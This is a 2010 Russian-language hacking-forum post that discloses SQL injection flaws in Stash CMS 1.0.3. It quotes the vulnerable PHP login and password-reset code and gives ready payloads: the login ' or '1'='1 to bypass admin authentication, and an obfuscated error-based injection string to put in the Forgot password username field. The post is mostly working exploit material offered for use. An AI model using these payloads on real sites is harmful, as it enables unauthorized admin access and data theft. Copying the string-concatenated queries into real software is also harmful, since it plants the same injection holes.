27.02.2010, 19:43
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Stash CMS 1.0.3
1) bypass (требования: mq=off)
file: /admin/library/authenticate.php
PHP код:
function login($username,$password,$remember,$location){
$database = new Db();
$results = $database->sqlQuery("SELECT user_key,user_firstname,user_lastname, user_admin FROM ".TBPREFIX."_user WHERE user_password = '$password' AND user_username = '$username'");
if($results){
foreach($results as $results){
$userkey = $results['user_key'];
$firstname = $results['user_firstname'];
$lastname = $results['user_lastname'];
$admin = $results['user_admin'];
}
$name = $firstname." ".$lastname;
$uniquekey = $name.$userkey;
$uniquekey = md5($uniquekey);
$_SESSION['username'] = $name;
$_SESSION['userkey'] = $userkey;
$_SESSION['uniquekey'] = $uniquekey;
$_SESSION['admin'] = $admin;
if ($remember == true){
setcookie("bsm", $userkey, time()+108000); /* expire in 30 days */
setcookie("msb", $uniquekey, time()+108000); /* expire in 30 days */
}
header('location:'.$location);
}else{
return false;
}
}
result:
login: ' or '1'='1
pass: asd
-------------------
боян
-------------------
3) blind sql injection (требования: mq=off,желательно 5 ветка бд)
file: resetpassword.php
PHP код:
$username = $_POST['username'];
$check = $database->sqlQuery("SELECT count(*) as cnt FROM ".TBPREFIX."_user WHERE user_username = '$username'",TRUE,FALSE);
if($check['cnt'] == 0){
if ($username == '') {
$msg = 'You must enter your Username';
}else {
$msg = $username. " doesn't exist";
}
result:
Тыкаем в /admin/login.php Forgot your password, в поле username пишем :
Код:
'/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)/**/and/**/'1'='1
......
Последний раз редактировалось .:[melkiy]:.; 27.02.2010 в 20:04..
|
|
|